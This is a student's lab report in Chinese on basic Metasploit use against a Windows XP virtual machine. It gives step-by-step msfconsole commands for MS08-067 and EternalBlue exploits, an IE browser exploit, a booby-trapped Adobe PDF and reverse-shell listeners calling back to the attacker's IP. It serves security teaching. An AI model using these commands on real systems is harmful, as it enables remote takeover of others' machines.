20164319 刘蕴哲 Exp5 MSF基础应用
【实践内容】
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1.1一个主动攻击实践(这里我做了两个:ms08_067【成功】和ms17_010【成功】)
1.2 一个针对浏览器的攻击(ms10_090【成功且唯一】)
1.3 一个针对客户端的攻击(这里我针对的是Adobe【成功】)
1.4 成功应用任何一个辅助模块。(portscan/syn【成功】)
【实验步骤】
[part.1]主动攻击实践
①这里首先扫描一下系统的漏洞,在攻击端linux系统主机(IP=192.168.1.177)上使用指令对windows xp系统的靶机(IP=192.168.1.110)进行漏洞扫描
nmap -O 192.168.1.110
nmap --script==vuln 192.168.1.110
出来一大串扫描的靶机端口状态和其他信息
扫描出两个漏洞,如下MS08-067:
和MS17-010:
下面分别利用这两个漏洞进行主动攻击
②MS08-067
MS08-067 漏洞是2008 年年底爆出的一个特大漏洞,存在于当时的所有微软系统,杀伤力超强。其原理是攻击者利用受害主机默认开放的SMB 服务端口445 ,发送恶意资料到该端口,通过MSRPC接口调用Server服务的一个函数,并破坏程序的战缓冲区,获得远程代码执行(Remote Code Execution) 权限,从而完全控制主机。
在msfconsole控制台内进行如下指令,获取靶机shell:
search ms08_067 //搜寻该漏洞对应的模块 use exploit/windows/smb/ms08_067_netapi //启用该渗透攻击模块 show payloads //查看该模块所适用的攻击载荷模块 //作为攻击载荷的Payload就是通常所说的Shellcode,常用的攻击载荷类型有开放监听后门、回连至控制端的后门、运行某个命令或程序、下载并运行可执行文件、添加系统用户等 set payload generic/shell_reverse_tcp //选择一个载荷(选择运行后门,让它回连至控制端) show options //查看配置渗透攻击所需的配置选项 show targets //查看渗透攻击模块可以渗透攻击的目标平台 set RHOST 192.168.1.110 //设置靶机IP set LPORT //设置攻击机端口 set LHOST 192.168.1.177 //设置攻击机IP set target //设置目标系统类型,选择0(Automatic Targeting,自动判断目标类型) //自动判断并不能保证绝对准确,真实渗透测试中,最好还是能够基于情报搜集环节的结果,进行主动确定 exploit //发起渗透攻击
回连windows xp靶机
获取shell成功
③MS17-010
多个 Windows SMB 远程执行代码漏洞
当 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时,存在多个远程执行代码漏洞。成功利用这些漏洞的攻击者可以获取在目标系统上执行代码的能力。
为了利用此漏洞,在多数情况下,未经身份验证的攻击者可能向目标 SMBv1 服务器发送经特殊设计的数据包。从内存进程获取敏感信息。
同样在msfconsole控制台内进行如下指令,获取靶机shell:
search ms17_010 use exploit/windows/smb/ms17_010_eternalblue show targets show options set RHOST 192.168.1.110 exploit
回连windows xp靶机,获取shell成功
[part.2]针对浏览器的攻击
在文件夹目录下
/usr/share/metaploit-framework/modules/exploit/windows/browser
打开终端,用“ls”指令检索漏洞,可以看到所有的漏洞
但是为了筛选浏览器的漏洞,并且选择较合适的漏洞,我们进入msf控制台用指令
search all
找到Internet Explorer有关的漏洞,选择rank较高的漏洞,这里我筛除之前别人使用过的浏览器漏洞之后,选择了漏洞ms10_090,因为它的rank为“good”
search一下ms10_090,确认一下它的全名和信息
然后设置相关模块、攻击者LHOST的IP和LPORT端口
use exploit/windows/browsers/ms10_090_ie_css_clip
set payload windows/meterpreter/reverse_http
set RHOST 192.168.1.110
set LPORT 4319
set LHOST 192.168.1.177
show options
exploit
得到的攻击链接,用win xp的IE浏览器登录链接网址http://192.168.1.177:8080/ZFKiise
然后xp端的IE浏览器卡了一会闪退了(没截成图),但是kali端的回连显示成功:
然后在这里碰到点小问题,我在键入:
session -i 1
结果报错,然后尝试了一下:
sessions
sessions -i 1
成功获取shell:
[part.3]针对客户端的攻击
这里我针对攻击的是Adobe
在msf控制台中搜索漏洞,选择漏洞之后,键入
search adobe //查找与adobe有关的漏洞 use windows/fileformat/adobe_cooltype_sing //使用攻击模块 set payload windows/meterpreter/reverse_tcp //设置载荷 set LHOST 10.43.45.131 //攻击段IP set FILENAME .pdf//设置生成文件的文件名,如不设置,则默认msf.pdf exploit //攻击
生成的pdf文件所在地址/root/.msf4/local我一直找不到,后来误打误撞发现了问题!!!
这个“显示隐藏文件”不勾选的话,搜索也搜不到,可以说是十分坑了。。。
将这个pdf文件拷贝到靶机(此处需利用虚拟机镜像文件进行文件的复制,然后直接拖拽到win xp桌面):
然后在kali端退出模块,进入监听模块开始监听
back //退出当前模块
use exploit/multi/handler //使用监听模块
set payload windows/meterpreter/reverse_tcp //设置攻击载荷
set LHOST 10.43.45.131
exploit //攻击
成功获取shell
[part.4]成功应用任何一个辅助模块
在msf操作台上进行如下操作:
use auxiliary/scanner/portscan/syn show options set RHOST 10.43.60.19 //设置靶机IP地址 set THREAD //设置线程数 run nmap -sS -Pn 10.43.60.19 //对靶机进行扫描
【实验感悟】
本次实验使我对各个漏洞模块的运用更加熟悉,通过查找漏洞,利用适合靶机特性的漏洞,可以在msf控制台里面检索search all,可以查看到所有漏洞的等级以及详细信息(通过这个可以揣测出它是针对什么的漏洞),更容易回连成功,这也是我在不断尝试中总结出来的道理。这次实验的过程中也出现了不少问题,做到第三个部分的时候,因为网络环境变化的原因,我失败了好几次,在发现虚拟机互相之间ping不通时才意识到是我的虚拟机在桥接模式下IP地址发生了变化,设置模块载荷的时候设定的数据也就不对了,所以我后面两个部分的实验,靶机的ip地址都从192.168.1.110换成了10.43.60.19,攻击端的ip从192.168.1.177换成了10.43.45.131,不过实验算是顺利完成了。
20164319 刘蕴哲 Exp5 MSF基础应用的更多相关文章
- 20164319 刘蕴哲 Exp3 免杀原理与实践
[实验内容] 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程( ...
- 20164319 刘蕴哲 Exp2 后门原理与实践
[后门概念] 后门就是不经过正常认证流程而访问系统的通道. 特指潜伏于操作系统中专门做后门的一个程序,而“坏人”可以连接这个程序远程执行各种指令. (概念和木马有重叠) [学习内容] 使用nc实现wi ...
- 20164319 刘蕴哲 Exp1 PC平台逆向破解
[实践内容概述] 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串. 该程序同时包含另一个代码片段,ge ...
- 20164319 刘蕴哲 Exp4:恶意代码分析
[实验内容] ①系统运行监控 使用如计划任务,每隔一分钟记录自己的电脑有哪些程序在联网,连接的外部IP是哪里.运行一段时间并分析该文件,综述一下分析结果.目标就是找出所有连网的程序,连了哪里,大约干了 ...
- 20165101刘天野 2018-2019-2《网络对抗技术》Exp5 MSF基础应用
目录 20165101刘天野 2018-2019-2<网络对抗技术>Exp5 MSF基础应用 1. 实践内容 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器 ...
- 2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用 exploit选取 主动攻击:ms17_010_eternalblue(唯一) 浏览器攻击:ms05_054_onlo ...
- 2018-2019 20165232 Exp5 MSF基础应用
2018-2019 20165232 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个 ...
- 2018-2019 20165237网络对抗 Exp5 MSF基础应用
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...
- 2018-2019 20165221 网络对抗 Exp5 MSF基础
2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...
随机推荐
- Preloading Your ASP.NET Applications
You may have noticed that the first request to an ASP.NET Web site takes longer than subsequent requ ...
- 关于getClass()的一些自己的见解
通过观看视频讲解,我得知,Class 老师讲解的是 这个是类的类,即是管理类的类.当时不是很理解,随后查询了相关资料后,以及真切的运行了几行代码后,才有一些深层次的体会, 在这里想要跟大家分享一下.如 ...
- js 连接mqtt
js连接mqtt 项目中要用到mqtt,前端调用,使用github开源的paho-mqtt.js,api还是挺全面的,网上各种教程很全面,但是感觉代码过于杂乱,故而封装的一下.仿jquery ajax ...
- CUDA编程模型——组织并行线程3 (2D grid 1D block)
当使用一个包含一维块的二维网格时,每个线程都只关注一个数据元素并且网格的第二个维数等于ny,如下图所示: 这可以看作是含有二维块的二维网格的特殊情况,其中块儿的第二个维数是1.因此,从块儿和线程索引到 ...
- spring boot 整合 云之讯 demo
---恢复内容开始--- package com.zhourong.controller; import org.apache.commons.lang3.RandomStringUtils; imp ...
- Thinkphp5.0支付宝支付扩展库类库大全
Thinkphp5.0支付宝支付扩展库类库大全,包括手机网站支付.电脑网站支付.支付查询.退款.退款查询.对账单等. Thinkphp5.0支付宝调用方法: 电脑网站支付 Pagepay.php 调用 ...
- 深入理解Java虚拟机读书笔记6----早期(编译期)优化
六 早期(编译期)优化 1 “编译期”的含义 · 可能是指一个前端编译器把*.java文件转变成*.class文件的过程,前端编译器如:Sun的Javac.Eclipse JDT中的增量式 ...
- Python paramiko模块基本使用(一)
使用paramiko模块登录远程主机,对日志进行统计分析. import paramiko def batch_count(days, hours, ips, user, passwd, source ...
- django之缓存的用法, 文件形式与 redis的基本使用
django的缓存的用法讲解 1. django缓存: 缓存的机制出现主要是缓解了数据库的压力而存在的 2. 动态网站中,用户的请求都会去数据库中进行相应的操作,缓存的出现是提高了网站的并发量 3. ...
- MPC学习笔记1:基于状态空间模型的预测控制(1)
MPC调节器 1.给定一个由状态空间法描述的离散系统: MPC控制器与其他线性二次调节器(LQR)的区别就在于其可以很好的将系统动态约束纳入考虑. 采样周期Ts控制了算法的效率,太大会错过很多系统运行 ...